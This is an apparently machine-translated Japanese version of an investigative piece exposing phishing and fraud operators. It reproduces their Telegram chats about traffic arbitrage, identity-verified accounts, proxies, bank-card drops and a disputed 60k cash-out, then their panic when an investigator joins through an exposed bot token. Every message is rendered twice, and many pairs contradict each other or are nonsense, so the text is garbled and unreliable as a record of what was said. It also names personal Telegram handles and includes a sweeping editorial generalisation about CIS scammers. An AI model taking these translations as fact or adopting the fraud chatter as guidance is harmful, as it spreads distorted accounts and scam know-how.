最初のグループには600人いるのに、彼は返事をくれない。最初の600人に対しては、彼は返答していない
B
ボニャ2025-03-05 15:41
お金に余裕があるなら、200ドルで売られているものを買うといいでしょう。もし手持ちのお金があるなら、200ドルを要求している方を選んでください
B
ボニャ2025-03-05 13:55
「学生用チャットルームがある」ということを教えるのが得意な人は誰ですか?ファンタスティカで学んでいる人、生徒用のチャットはある?
B
ボニャ2025-03-03 15:10
小切手レシート
B
ボニャ2025-03-03 15:10
掃除機をかけるやつ掃除機をかけている人
B
ボニャ2025-03-03 15:10
了解しましたある
B
ボニャ2025-03-03 15:10
たぶん、ソフトウェアを使った売春婦もいるんだろうな。まあ、ここには間違いなくソフトを使った詐欺師がいる
B
ボニャ2025-03-03 15:09
それはかつては
B
ボニャ2025-03-03 15:09
ああ、それはいいですね。おっ、これいいね
B
ボニャ2025-03-03 15:09
トリヌリウエト・ルルトリヌリウエット・ルル
B
ボニャ2025-03-03 15:09
そして、それらは集められているそして、それらは集められている
B
ボニャ2025-03-03 15:09
ティップはただそこに座って、包装紙をめちゃくちゃにしているティップが座って、スナックの袋をばら撒いている
B
ボニャ2025-03-03 15:04
なぜウクライナのナンバープレートがあるのですかP なぜウクライナ語の番号なの?
B
ボニャ2025-03-03 15:03
「kc」って言ったんだ。「КЦ」と言った
B
ボニャ2025-03-03 15:03
わかった。わかった
B
ボニャ2025-03-03 15:03
もし複雑なら、ボウラーハットをなくしてしまうことになるよ。ここだと、お前のポットが吹き飛んじゃうかもね
B
ボニャ2025-03-03 15:03
くそっ、俺がルーを火から下ろしてる間に、お前がFBリカルを何回やるか比べてみようぜ。くそ、さあ、比較してみろよ。俺がカメラを構えてる間に、Facebookのリカバリーを何回実行できるか
B
ボニャ2025-03-03 15:02
エスコートについてエスコートへ
B
ボニャ2025-03-03 15:02
あの連中は、クソ野郎を刺激するようなチティ・チティな展開をしている。チート野郎どもは、クソみたいなオナニーを仕掛けるために成長したんだ
B
ボニャ2025-03-03 15:02
くそっ、ここにはワークスばかりだ。ここには、ル語を話すワーカーばかりだ
B
ボニャ2025-03-03 15:02
どのようなテーブルですかどんなテーブルがありますか
B
ボニャ2025-03-03 15:01
声が美しければ、30はあなたのものになるでしょう。「声が美しければ、30はあなたのものになる」
B
ボニャ2025-03-03 15:01
もっとお金があるあっちの方がお金が多い
B
ボニャ2025-03-03 15:01
私の職場で一緒に働きませんか。私のところの文化センターで働くために来た
B
ボニャ2025-03-03 15:00
いいえいいえ
B
ボニャ2025-03-03 14:59
Plategamプラテガム
B
ボニャ2025-03-03 14:59
+ リプレイの操作方法がわからない+ ポヴェトガについてはよくわからない
B
ボニャ2025-03-03 14:59
良いドロップはなかなか手に入らないものだ。良いドロップを見つけるのは難しい
B
ボニャ2025-03-03 14:58
それとも、1.0ってあるのかな?それとも 1.0 がある
B
ボニャ2025-03-03 14:58
ここには2.0フィッシュが2匹しかいない。そして、こちらは2.0アンペア対応のフィッシュです
B
ボニャ2025-03-03 14:58
それなら、2.0より1.0の方がましだ。まあ、2.0よりは1.0の方がましかな
B
ボニャ2025-03-03 14:57
マンモスとともにマンモスと一緒に
B
ボニャ2025-03-03 14:57
2.0は、ただ座ってダラダラしていてもうまくいかない。2.0じゃ、ダラダラと無駄話してばかりいるのはダメだ
B
ボニャ2025-03-03 14:57
僕はどちらかといえば交通担当の方です。トラフィックに関しては、もう私じゃない
B
ボニャ2025-03-03 14:57
Rooによる「X's」はこちらです手元の「X」マーク
B
ボニャ2025-03-03 14:56
しかし、これらは広告チームではないでも、これらは宣伝チームではありません
B
ボニャ2025-03-03 14:56
そうなんです。そういう人を知っています。(やってる)知り合いがいる
B
ボニャ2025-03-03 14:56
1日に400~500を稼ぐ方法を知っているなら、手元にはないでしょう。いや、もしやり方が分かれば、1日400~500くらいは稼げるよ
B
ボニャ2025-03-03 14:55
「で、何がそんなに大したことなの?」)まあ、ここで何を忘れてたんだっけ)
B
ボニャ2025-03-03 14:55
マニュアルへのリンクがありますそこにマニュアルへのリンクがあります
B
ボニャ2025-03-03 14:54
こういう手なんだこういう手口でやり始めるんだ
B
ボニャ2025-03-03 14:54
クソ、よだれを垂らして、あのクソみたいな手を手に入れようとじろじろ見てる。セックスしてルを興奮させるには、よだれを垂らして、目を左右に大きく見開けばいいんだ
B
ボニャ2025-03-03 14:54
えーと、何が問題なの? 同じヴォークなんだから。まあ、それなら何が問題なんだ? これと同じようなワークじゃないか
B
ボニャ2025-03-03 14:53
そのエリアに着くまで1ヶ月かかるだろう1ヶ月でそのエリアまで連れて行かれる
B
ボニャ2025-03-03 14:53
それに、行く先なんてどこにもない。頭があれば、わかるだろう。なければ、ここから出て行け。それに、ここには行くところもないし、頭があれば理解できるだろうし、なければどうすることもない。
B
ボニャ2025-03-03 14:53
何が欲しいの?一体何がしたかったんだ?
B
ボニャ2025-03-03 14:52
ここに来て2日になるけど、2.0は面白くないな。最初はかっこいいと思ってたんだけど。ここに来て2日目だけど、2.0には興味ない。ちょっと面白そうだなと思ってたんだけど。
B
ボニャ2025-03-03 14:52
そして、マンモスをどうぞそしてマンモスを飼う
B
ボニャ2025-03-03 14:52
頭を使って、何を言うべきか考えてみてください。どう返事しようか、ちょっと考えなきゃ。
B
ボニャ2025-03-03 14:52
秘密などないここには秘密なんてない
B
ボニャ2025-03-03 14:52
彼はあなたに何を与えてくれるのでしょうかそれはあなたに何をもたらすのでしょうか
B
ボニャ2025-03-03 14:52
まあ、マニュアルに同じ情報が全部載っているなら、何の意味があるんだろう。ところで、マニュアルにその情報が全部載ってるなら、意味があるのかな
B
ボニャ2025-03-03 14:51
彼には、君たちのすべての「ディック」に答える時間があるだろうみんなの質問に全部答えるのは無理だよ
B
ボニャ2025-03-03 14:51
なんて練習なんだ。どのような実践か
B
ボニャ2025-03-03 14:51
あの中には100人も人がいるんだ。おい、あそこには100人ずついるじゃないか
B
ボニャ2025-03-03 14:51
お金を少しくれたら、そのクランプの取扱説明書をあげるよ。ちょっと金を送ってくれない? そうしたら、固定スレッドからマニュアルをあげるよ
B
ボニャ2025-03-03 14:50
修正にあたって固定中
B
ボニャ2025-03-03 14:50
すべてを教えるのに、マニュアルなど必要ありません。「トレーニングなんてどうでもいいよ、マニュアルがあるんだから」
B
ボニャ2025-03-03 14:50
2.0は、まあそういうものですね。2.0 昔も今も変わらない
B
ボニャ2025-03-03 14:50
一体何が問題なんだ?これ、一体どんな問題なんだ?
B
ボニャ2025-03-03 14:48
自分で始めたんですか?もう自分で始めたの?
B
ボニャ2025-03-03 14:48
「クー・クー」じゃないどうしてもうまくいかない
B
ボニャ2025-03-03 14:48
lkにヒットがありますLKにはキルがある
B
ボニャ2025-03-03 14:48
lkの件、どういうこと?LKのワークとはどのようなものか
B
ボニャ2025-03-03 14:48
お前ら、お前らが言うところの「クソ野郎」ってやつは、この中でどれなんだ?「こいつら、一体誰なんだよ? なんて言い方だ」
B
ボニャ2025-03-03 14:47
ここでのあなたの言っていることがよくわかりません。ここ、君が何て言ったのかよくわからなかった
B
ボニャ2025-03-03 14:46
ログイン済みなら、それは素晴らしいですね。もしLCに入ったら、ZBSだ
B
ボニャ2025-03-03 14:46
さて、彼らはログインしているのかな?じゃあ、LCにはアクセスできる?
B
ボニャ2025-03-03 14:45
どうやって撮影しているのか、私にはわかりません。うーん、どうやって撮るのかよくわからないな
B
ボニャ2025-03-03 14:45
見限るべきワンちゃんたち?購読を解約しますか?
B
ボニャ2025-03-03 14:45
ちくしょう、ここにはクソみたいな押しボタンがあるじゃないかそんなのどうでもいいし、さっさとやれよ
B
ボニャ2025-03-03 14:42
自分で注いでいます自分で注いでる
B
ボニャ2025-03-03 14:42
マジで、これってクソみたいなことじゃないって気づいたよ。クソ、わかったよ、そんなのクソみたいな話じゃねえ
B
ボニャ2025-03-03 14:41
おい、ここじゃチップじゃ何も売ってないよ。給料日用のチップなんだ。ブラタン、ここではフィッシュで何も売ってないよ。支払いにフィッシュを使うんだ。
B
ボニャ2025-03-03 14:41
わかるよ、注ぐ場所がないんだねなるほど、ここには注ぐ場所がないんだな
B
ボニャ2025-03-03 14:40
Regular 2.0、だと思います。普通の2.0みたいな感じ
B
ボニャ2025-03-03 14:40
交通量が溢れかえっているわけでもないのにだから、ここではトラフィックを流さないんだ
-- Фбстор - 成功したウェブマスターたちのチャット! (23件のメッセージ) --
B
ボニャ2025-02-26 07:51
まあ、その顔で好きにしろよ。まあ、とにかく、あっちで誰の顔かなんてどうでもいいさ
B
ボニャ2025-02-26 07:50
男子生徒は200ルーブルだ。まあ、女子高生には200ルーブルくらいあげようか
B
ボニャ2025-02-26 07:50
うまくいくよこれで大丈夫
B
ボニャ2025-02-26 07:50
通りでホームレスの男性を見かけるでしょう。路上でホームレスを見つけたら、通り過ぎてください
B
ボニャ2025-02-26 07:50
つまり、誰もが自分の顔を信じているのだ。それが誰の顔であろうと。みんな自分の顔で認証してるし、他人のことなんてどうでもいいよ
B
ボニャ2025-02-26 07:50
顔に。自分の顔に
B
ボニャ2025-02-26 07:49
でも、まあ、とにかく、もう10回もやったんだ。でも実際、まあいいや、10個くらいアカウントを認証済みにしてる
B
ボニャ2025-02-26 07:49
じゃあ、教えてよ。君はただでたらめを言ってるだけなんだね。じゃあ、悪口を言ってるのか?
B
ボニャ2025-02-26 07:49
次のことができますできます
B
ボニャ2025-02-26 07:49
顔に。自分の顔に
B
ボニャ2025-02-16 20:26
何かしらの訓練で彼らをめちゃくちゃにしたり、彼らを危険な状況にさらしたりする代わりに。「何かしらの講習なんて口実にして、彼らからトラフィックを搾り取ろうとしてるんじゃないの?」
B
ボニャ2025-02-16 20:25
lei、普通のUBT、TT、TT、YouTubeなど。YouTubeやその他一般的なUBT、TTなど
B
ボニャ2025-02-15 17:31
訓練という名目で「学習」という名目で
B
ボニャ2025-02-15 17:31
運河へチャンネルへ
B
ボニャ2025-02-15 17:31
単に人による交通量の問題です。単に、人々からのトラフィックが押し寄せてくるだけだ
B
ボニャ2025-02-15 17:31
その人は、自分のチャンネルをすべて登録するように言っているそいつが「自分のチャンネルを全部登録しろ」って言ってるんだ
B
ボニャ2025-02-15 16:36
書く必要はありませんフイニュからの提案ですが、書かなくても構いません
B
ボニャ2025-02-06 15:11
注ぎ方の基本を知らないと、きっと……もし「鋳造」といった基礎知識さえ知らないなら、どうなるだろう
B
ボニャ2025-02-06 15:11
aipiを変更するボタンがあります。せめてGoogleで検索してみるべきです。あそこのボタンを押すとIPアドレスが変わるよ。ググってみて
B
ボニャ2025-02-06 15:09
そこにあるaipiは、回転させることで変更できます。そこで、APIのローテーションを変更できます
B
ボニャ2025-02-06 15:09
なぜ1なのか? それは同じモバイルだからですなぜ1なのか、だってモバイルなんだから
-- CryptoGrab - 相互支援チャット (10件のメッセージ) --
B
ボニャ2025-02-06 15:31
そんなに単純な話じゃないそう単純な話ではない
B
ボニャ2025-02-06 15:31
簡単だよ。イージー
B
ボニャ2025-01-23 20:30
例が一つもない例は一つだけではない
B
ボニャ2025-01-23 20:30
インターネット上でAML検査の広告が一つも見つからなかったなんて、笑えない話だ。でも、ネット上でAMLテストの広告がまったく見つからなかったなんて、ちょっとおかしいよね
B
ボニャ2025-01-23 17:20
AMLには何も表示されていません。AMLにはまったく何もありません
B
ボニャ2025-01-23 17:20
FacebookでAMLを試してみたところ、アメリカでも有効だった。インターネット上では見つからない古いバンドルでも、やはり有効だった。FacebookでAMLについて調べてみたけど、ネット上にはアメリカに関するまともな情報、古い情報さえも見つからなかった。
B
ボニャ2025-01-23 17:19
さて、どんな提案をしようとしているんですか?ところで、具体的にどんなオファーを考えてるの?
B
ボニャ2025-01-23 17:16
amlを使っていますか?君はAMLを流してる?
B
ボニャ2025-01-21 20:38
FBを注ぐ人なら誰でも、いくつか疑問点を明確にしたいと思うでしょうFacebookに投稿している方がいらっしゃいましたら、いくつか質問させてください
B
ボニャ2025-01-20 11:08
AML用のcreosの例をご存知の方はいらっしゃいますか?AML向けのクリエイティブの例をお持ちの方はいらっしゃいますか?
-- ロレックス | 総合チャット (28件のメッセージ) --
B
ボニャ2024-09-11 15:29
リトアニア人たちは、どのコートで何をしているのでしょうか?リトアニアはどの会場で叩かれているんだ?
B
ボニャ2024-09-11 15:21
ネジをいじってるの?おい、お前、頭おかしいのか?
B
ボニャ2024-09-11 15:20
ただ、サイトがすごく制限が厳しくて、そのせいでいろいろと手間がかかるんだただ、プラットフォームのせいで作業がすごく制限されちゃうし、それに関する面倒なことが山ほどあるんだ
B
ボニャ2024-09-11 15:19
頭の中にテーマが浮かんでいるんだ。もし彼らがそれを実現してくれたら、マジで最高になるだろうな。そこであるテーマを思いついて、ツァムに書いてみたんだけど、もし実現したら最高だ
B
ボニャ2024-09-11 15:19
フィンカには、ログがあまり見当たらない。フィンケのロゴは、正直あまり見当たらないな
B
ボニャ2024-09-11 15:19
あいつら、会場の件でめちゃくちゃなことが起きてるんだ。いや、あいつら、すべての会場で何かとんでもない騒ぎを起こしてるんだろ
B
ボニャ2024-09-11 15:16
まさにその通り。まるで「フォード」の上に「フォード」が乗っているようなものだ。まあ、やっぱり詐欺に次ぐ詐欺ってやつだね
B
ボニャ2024-09-11 15:15
今、何が良くなっているのかさっぱりわからない。フィンランドでは誰も働いていないようだ。今、どちらがうまくいっているのか、私にはさっぱりわからない。みんなのフィンクで何かがうまくいっていないみたいだ。
B
ボニャ2024-09-11 15:08
まあ、プロキシでうまくいくかどうかは五分五分ですね。まあ、プロキシがうまくいけば50/50かな
B
ボニャ2024-09-11 15:07
でも、ご理解いただきたいのですが、最近は「ラグジュアリー・プロキシ」が使われているせいで、Viberでさえログインすると、システムがパニック状態になってしまうんです。でも、今、ラクシェリのプロキシを使っていると、Viberにアクセスしたときでさえ、フロードになるってことを理解しておいてほしい
B
ボニャ2024-09-11 15:07
うーん、EUの缶についてはよくわからないな。まあ、EUの銀行のことなんてよくわからないんだけどね
B
ボニャ2024-09-11 15:07
lkにてВ лк
B
ボニャ2024-09-11 15:06
昔は、デリカテッセンにはウォークイン冷蔵庫が10台あったものだ以前は、10回塗ればラッカーがしっかり定着していた
B
ボニャ2024-09-11 15:06
さて、922も1インで持ちこたえている。まあ、922も1が入ってきて、キープしてるね
B
ボニャ2024-09-11 15:05
たとえ3回通った後でも、プライベートな場面では彼らは動揺してしまう。3回も侵入した後は、プライベートモードでも彼らを騙せる
B
ボニャ2024-09-11 15:05
1つのプロキシにつき1~2行の銀行1つのプロキシにつき1~2つのバンクの場合、電流は
B
ボニャ2024-09-11 15:05
そうですね、どの銀行かによって異なりますまあ、どの銀行かにもよりますが
B
ボニャ2024-09-11 15:04
ラクシェリの戯言の中では、代理人たちは往々にして汚らわしい存在だラクシェリ・フイニャのプロキシは、しばしば汚れている
B
ボニャ2024-09-11 08:44
あれ、寝てるの?あの人、寝てるの?
B
ボニャ2024-09-11 08:40
ああ、それは素晴らしいアイデアですね。ZBSが思いついた
B
ボニャ2024-09-11 08:40
あそこ、フリーマーケットみたいなのとかないの?でも、あそこにはあちこちにあるようなフリーマーケットみたいなものはないんだ
B
ボニャ2024-09-11 08:40
最悪だウエボ
B
ボニャ2024-09-11 08:39
ビリヤビリヤ
B
ボニャ2024-09-11 08:39
チャットルームはありますか?あそこにはチャット機能はあるの?
B
ボニャ2024-09-11 08:38
どなたかご存知の方はいらっしゃいますか誰か知っている人はいますか
B
ボニャ2024-09-11 08:38
フィンカの人たちはTGを使っていますか?フィンランドでは、TGを使っている人はいますか?
B
ボニャ2024-09-10 12:14
ありがとうございます。ありがとう
B
ボニャ2024-09-10 12:13
フィンランドの時間は今何時ですかフィンカでは今、時間が飛ぶように過ぎている
-- 最新情報/認証/稼ぎ方💃🛍 (37件の投稿) --
B
ボニャ2024-06-16 17:17
彼女を熱烈に擁護する人は見当たらないここには彼女を熱烈に擁護する人は見当たらない
B
ボニャ2024-06-16 17:17
まあ、とにかく状況はすべて説明されたわけで、あとは各自が自分の選択をするだけだ。そして、パシャという管理者のみ彼女が擁護しているという事実が、多くのことを物語っている。まあ、状況は説明したし、あとは各自が自分で判断するしかない。ただ、彼女を擁護しているのはパシャ管理者のみだということは、多くのことを物語っている。
B
ボニャ2024-06-16 17:15
そして、彼女はまた支払いをしなかったそして、彼女はまた支払わなかった
B
ボニャ2024-06-16 17:15
いいえ、彼女が私たちに振り込んでくれたのですが、そのお金を振り込むためのメインの口座がなかったため、最後の手段としてヴィカに手紙を書きました。いや、彼女はそれを私たちに押し付けたんだけど、その時点で私たちには送金するためのメインのドロップがなかったから、最後の手段としてウィキに連絡したんだ
B
ボニャ2024-06-16 17:14
最初は私たちも問題なかったんだけど、最近、あなたのお金がしょっちゅうなくなっているんだ。最初は私たちも何の問題もなかったのですが、ここ最近はあなたの方でお金がしょっちゅう消えてしまいます
B
ボニャ2024-06-16 17:14
これってスパムかな? 僕はただここに座って、みんなに真実を伝えているだけなのに。捨ててしまってもいいよ。自分の仕事のやり方をみんなに知らせておけばいい。これってスパムですか?私はただ人々に真実を伝えているだけなのに。削除しても何が変わるというんですか。あなたたちがどうやって仕事をしているのか、人々に知ってもらいたいのです。
B
ボニャ2024-06-16 17:13
こういうものが一つあるときはもしそんなことが起きたら
B
ボニャ2024-06-16 17:13
さあ、今こそ振り返る時ですですから、そろそろ考え直すべき時です
B
ボニャ2024-06-16 17:13
私たちもneiとは長い間取引を続けていますが、このような事態は今回で2回目です私たちも彼女とは長い間一緒に仕事をしてきて、これはもう2度目の出来事です
B
ボニャ2024-06-16 17:13
そして彼女はGSを録音して、「やり方はわかってるでしょ」と言った。彼女はGSを記録して、「その仕組みはご存知ですよね」と言った。
B
ボニャ2024-06-16 17:13
まさにそういう話なんだ。最初から説明しよう。俺たちは彼女からカードを受け取って60kを入金した。彼女が引き出しに行ったら、「ATMがカードを飲み込んでしまったので、お金は引き出せない」と表示されただけ。つまり、俺たちは60kを無駄にしてしまったわけだ。まさにその通りです。では、最初から説明しましょう。まず、彼女からキャッシュカードを受け取り、6万をチャージしました。彼女が引き出しに行くと、「お金は出ない」と言ってきたのです。どうやらATMがカードを飲み込んでしまったらしく、結局、私たちは6万を無駄にしてしまいました。
B
ボニャ2024-06-16 17:11
私たちを操っているのは彼女じゃないそれとも、私たちが彼女のもとへ行くのか
B
ボニャ2024-06-16 17:11
確かに6万が盗まれたのですが60kを盗まれたけど
B
ボニャ2024-06-16 17:11
「普通?」って? ここですべて説明したはずだ。つまり、俺たちをバカ呼ばわりしてるわけか。「普通?」って? こっちは全部説明したのに、あんたたちは俺たちをバカ呼ばわりしてるじゃないか
B
ボニャ2024-06-16 17:10
あなたは彼女を擁護しているあなたは彼女を擁護しているのですか
B
ボニャ2024-06-16 17:10
彼女はまだ私たちのお金を持っている私たちのお金は彼女の手元に残ってしまった
B
ボニャ2024-06-16 17:10
それらすべてすべて
B
ボニャ2024-06-16 17:10
ある男に6万が渡されたというのに、彼女は「お金なんてない」と言った。ある人に6万を振り込んだのに、その人は「お金は出ない」と言った
B
ボニャ2024-06-16 17:10
説明*説明*
B
ボニャ2024-06-16 17:10
この状況の全容については、すでに説明済みです状況の全容を君に説明した
B
ボニャ2024-06-16 17:09
誰が仕掛けたの?彼女か、それとも私たちか。「ドロポ」なのは彼女なのか、それとも私たちなのか
B
ボニャ2024-06-16 17:09
銀行には6万あるはずなのに。そのお金はどこにあるんだ?60kを入金したけど、お金はどこへ行ったの?
B
ボニャ2024-06-16 17:09
状況についてはすでにすべて説明されているのだから、性別がどうであれ関係ない。どんな女性たちがこの状況を説明してくれたのか、性別は全く関係ない
B
ボニャ2024-06-16 17:08
6万ドルを引き出して、今日はこれで終わりにしよう。6万を稼いで、もういいや
B
ボニャ2024-06-16 17:08
あるいは、常識の範囲内で、くたばれ。それとも、常識の範囲内ならどうでもいいのか
B
ボニャ2024-06-16 17:08
人々は支払うべきものが何もない人々はどこからそのお金を払えばいいのか
B
ボニャ2024-06-16 17:08
そして彼は、カードが噛み砕かれてしまい、お金がなくなってしまったと言っている。「カードが読み取れない、お金がない」と言う
B
ボニャ2024-06-16 17:08
ある男に6万が注ぎ込まれ、彼女は撮影に向かった。ある女性に60kが振り込まれ、彼女はそれを引き出しに行った
B
ボニャ2024-06-16 17:07
じゃあ、事実を教えてくれるんだね。じゃあ、その根拠を具体的に説明してくれ
B
ボニャ2024-06-16 17:07
じゃあ、一体誰のせいだ? 俺を裏切った奴は誰なんだ?で、一体誰のせいだ? 俺がクソ野郎なのか?
B
ボニャ2024-06-16 17:07
何か言いたいことは?言うことない?
B
ボニャ2024-06-16 17:07
それか、クソみたいなPINコードを打ち込めなかったんだ。それとも、クソッ、手が不器用すぎてピンを入力できなかったのか
B
ボニャ2024-06-16 17:06
ATMがどうしてカードを詰まらせたりするんだ?一体どうやってATMがカードを飲み込んだんだ?
B
ボニャ2024-06-16 17:06
吸い盤サクション
B
ボニャ2024-06-16 17:06
それなのに、お前はあいつのために必死に頑張ってるんだ。お前ら、なんでここで彼女の動画をダウンロードしてるんだ?
B
ボニャ2024-06-16 17:06
お前ら生まれつきの天才どもは、クソ馬鹿だ。ここに座ってる女が金を使いまくってるのに、ATMにカードを飲み込まれちまったんだぞ。おい、お前らマジで頭おかしいな。お前のところにいるあのクソ野郎、おばあちゃんをめちゃくちゃにやってる。ATMが彼女のカードを飲み込んだらしいぞ。
B
ボニャ2024-06-16 16:40
@kysia1987 詐欺は通用しないよ。ドロップキックを食らわせて、6万と合併した@kysia1987 詐欺だからやめたほうがいいよ。少額投資したけど、6万を失って逃げた
モネッティ・エスコバル:沈黙のボス
ボニャの261件のメッセージとは対照的に、MONETTIのメッセージはわずか 公開メッセージ 10件 — すべてが1つのスレッドにまとめられていて TraFFeeQ チャット (ブラックハットADS/SEOトラフィック・アービトラージ)、同僚を擁護して:
TraFFeeQ チャット2025年12月
「男は仕事をこなして、その対価として給料をもらう――これについて何か言いたいことでもあるのか?」
人は自分の仕事をこなし、その対価として給料をもらっている。これ以上、何を議論する必要があるというのか)
犯罪行為を「単なる仕事」として正当化すること
TraFFeeQ チャット2025年12月
「君とは話すことなんて何もない」
君とは議論する価値もない
権威を軽視する姿勢――上司気取り、議論を許さない態度
TraFFeeQ チャット2025年12月
「あなた以外にもやることが山ほどあるんだから!」
君がいなくてもやることがあるよ)
彼の注意を必要とする複数の同時進行の作業があることを示唆している
MONETTIのTelegramグループには、その詳細が書かれています: メデューサ Google Ads (ブラックハットPPC詐欺)、a ディープフェイクチャンネル (詐欺用の合成メディア)、および マーロボ・チャット (非公開、不明)。Telegram Premiumのサブスクリプション、24時間365日の営業時間、および「Есть предложение」(「提案がある」)その経歴からは、サイバー犯罪を本業として取り組んでいる人物像が浮かび上がる。
MONETTI ESCOBAR:メッセージログ一覧(10件)
-- TraFFeeQ チャット | トラフィックアービトラージ | ブラックADS/SEO | (9件のメッセージ) --
ME
モネッティ・エスコバル2025-12-06 20:42
放っておけ!放っておけ!
ME
モネッティ・エスコバル2025-12-06 20:42
ある男性が自分の仕事をこなしているその人は自分の仕事に取り組んでいる
ME
モネッティ・エスコバル2025-12-06 20:42
攻撃的ではないいかなる攻撃性も
ME
モネッティ・エスコバル2025-12-06 20:40
そのことについても心配しなくていいですよそのことについても心配しないで
ME
モネッティ・エスコバル2025-12-06 20:39
彼と話してみなよ、兄弟。そんなことしても禁止されてるわけじゃないんだから。彼と話してみなよ、彼にそれをやるななんて言われてないんだから
ME
モネッティ・エスコバル2025-12-06 20:39
(君以外にもやることが山ほどあるよ!)(君以外にもやることがあるんだ!)
ME
モネッティ・エスコバル2025-12-06 20:39
君とは話し合うことなんて何もない君とは議論する価値もない
ME
モネッティ・エスコバル2025-12-06 20:38
彼のニックネームの横に書いてあるよ。タップしなくても、自然と目に入るはず。彼のニックネームの横に「『ты』で呼ぶのはやめて」と書いてあるから、読んでみて
ME
モネッティ・エスコバル2025-12-06 20:38
その男は自分の仕事をこなし、その対価として給料をもらっている(話し合いたい)人は自分の仕事をこなし、その対価としてお金をもらう。気に入ったら議論しよう)
-- メデューサ | Google Ads | チャット (1件のメッセージ) --
ME
モネッティ・エスコバル2025-09-23 18:07
😍😍

スクリーンショット 2 — MONETTIのTelegramプロフィール。

スクリーンショット 3 — ボニャのプロフィール。DC2(アムステルダム)に注目。
第7章:パニック・ルーム
PhishDestroyが公開されていたTelegramボットを通じてオペレーターグループにアクセスした後、次のようなやり取りが行われた。以下のチャットログは英語に翻訳されており、元のロシア語はイタリック体で残されている。アクセスに使用された身元情報は伏せられている。
— REDACTED は、公開されたボットトークンを介して参加しました —
R
削除済み25-03-2026 13:03:43
/start
ME
モネッティ・エスコバル25-03-2026 13:06:53
?
ME
モネッティ・エスコバル25-03-2026 13:07:03
誰誰
B
ボニャ25-03-2026 13:07:14
Xz不明
R
削除済み25-03-2026 13:07:14
こんにちは。データを保存してください。ちょっと待ってください。
ME
モネッティ・エスコバル25-03-2026 13:07:24
何だよ、マジかよ何だよ、クソ
B
ボニャ25-03-2026 13:07:27
くそっクソッ
B
ボニャ25-03-2026 13:07:28
それがあの人です一体誰だ
ME
モネッティ・エスコバル25-03-2026 13:07:42
うん。あはは
ME
モネッティ・エスコバル25-03-2026 13:07:44
何だよ、これ?チェ・ブル
B
ボニャ25-03-2026 13:07:53
ボットが乗っ取られてしまったボタが壊れた
B
ボニャ25-03-2026 13:08:16
うちの守備はめちゃくちゃだって言われたよ。そういえば、うちの防御はマジでヤバいって聞いたんだけど
B
ボニャ25-03-2026 13:08:22
まあ、そういうタイプもいるよねまあ、そういう感じのやつが一人
B
ボニャ25-03-2026 13:08:43
まるでフィッシング攻撃でボットを突破するようなものだ。フィッシュを使えば、ボットを壊すのは、指と指をぶつけるほど簡単だ
ME
モネッティ・エスコバル25-03-2026 13:09:09
@devosus
ME
モネッティ・エスコバル25-03-2026 13:09:21
[削除済み]。[削除済み]
ME
モネッティ・エスコバル25-03-2026 13:09:24
あれは誰?これは誰?
B
ボニャ25-03-2026 13:10:29
プロフィールを確認してください。プロフィールを見てみて
B
ボニャ25-03-2026 13:10:32
ハッカーだこれはハッカーだ
B
ボニャ25-03-2026 13:10:35
文字通り。文字通りの意味で
B
ボニャ25-03-2026 13:10:41
彼がチャネリングしている内容を翻訳した彼がチャンネルで書いている内容を翻訳しました
B
ボニャ25-03-2026 13:10:55
[削除済み — ボニャは、自分たちのドメインを報告したチャンネルからのメッセージをコピー&ペーストし、誰が通報したのかを突き止めようとしている]
B
ボニャ25-03-2026 13:12:19
えっと、その……まあ、仕方ないか
B
ボニャ25-03-2026 13:12:23
あいつが誰なのか、まったく見当もつかない。これが誰なのか、さっぱり見当もつかない
B
ボニャ25-03-2026 13:12:25
でも、ずっとそうとは限らないしかし、良いことではない
B
ボニャ25-03-2026 13:12:47
@devosus ボコボコにされる前に、防御について考えておこう。@devosus 俺たちのケツがぶっ割られる前に、防御策を考えておけよ
編集部注:ボニャはそれが迫ってきているのを感じている。仮に彼がロシア人で、ウクライナを騙すことを「愛国的な行為」だと考えているとしよう。では、インドネシアについてはどうだろうか――
2024年10月よりBRICSパートナー (カザン・サミット)? 同盟国の市民から盗むことも愛国心と言えるのだろうか? CISの詐欺師たちは、知性も忠誠心も皆無で、誰からでも平気で盗む連中だ。私たちが記録した他の調査記事もぜひ読んでほしい
起訴事例 同様の演算子については――結末はいつも同じだ。
ME
モネッティ・エスコバル25-03-2026 13:12:49
うん、そうだな。ああ、見えたよ
ME
モネッティ・エスコバル25-03-2026 13:12:55
くそったれ。ふざけんなよ
B
ボニャ25-03-2026 13:13:09
まあ、体力を奪われるのも、それほどワクワクすることじゃないけどね。まあ、溶け合うのも、それほど楽しいことじゃないけどね
ME
モネッティ・エスコバル25-03-2026 13:13:13
彼は何もしないだろう彼は何もしないだろう
ME
モネッティ・エスコバル25-03-2026 13:13:18
彼はどうするつもりなんだろう?彼は何を売り払うつもりなのか?
D
デヴォイズ25-03-2026 13:13:26
それは何かこれは何?
ME
モネッティ・エスコバル25-03-2026 13:13:34
ああ、ある男が参加したんだあの人、参加したんだ
D
デヴォイズ25-03-2026 13:13:34
どこからどこから
B
ボニャ25-03-2026 13:13:35
たとえ自分のIPアドレスからフィッシングサイトに数回ログインしたとしても、もうそんなことは許されない。自分のIPアドレスからフィッシュに2、3回アクセスしただけでも、もう面白くなくなっちゃう
ME
モネッティ・エスコバル25-03-2026 13:13:37
グループの皆様へグループへ
ME
モネッティ・エスコバル25-03-2026 13:13:38
Xz不明
D
デヴォイズ25-03-2026 13:13:39
interpol を実行するときインターポールに
D
デヴォイズ25-03-2026 13:13:41
それに対してどんな
ME
モネッティ・エスコバル25-03-2026 13:13:44
これこの
B
ボニャ25-03-2026 13:13:46
ただおしゃべりしに来ただけなんだここ、チャットに飛びました
B
ボニャ25-03-2026 13:13:49
彼は次のように書いた。「こう書いた」
ME
モネッティ・エスコバル25-03-2026 13:13:56
.
B
ボニャ25-03-2026 13:13:57
こんにちは。データを保存してください。ちょっと待ってください。
ME
モネッティ・エスコバル25-03-2026 13:14:11
[共有された写真]
D
デヴォイズ25-03-2026 13:14:31
前にも見たことがある。そういうの、前にも見たことあるよ
B
ボニャ25-03-2026 13:14:44
まあ、ukrボットについてもバレてしまったわけだ。まあ、ウクライナのボットにやられてしまったね
B
ボニャ25-03-2026 13:14:55
チャットルームでメッセージを送らなかったね。チャットにはまだ書き込みがありません
B
ボニャ25-03-2026 13:14:57
「~って書いたんじゃないの?」いや、書いてあったよ
ME
モネッティ・エスコバル25-03-2026 13:15:04
どうでもいいよ。まあ、どうでもいいよ
B
ボニャ25-03-2026 13:15:06
当チャンネルを代表してチャンネルを代表して
D
デヴォイズ25-03-2026 13:15:23
そんなのクソくらえだ。もういいよ、クソッ
ME
モネッティ・エスコバル25-03-2026 13:15:31
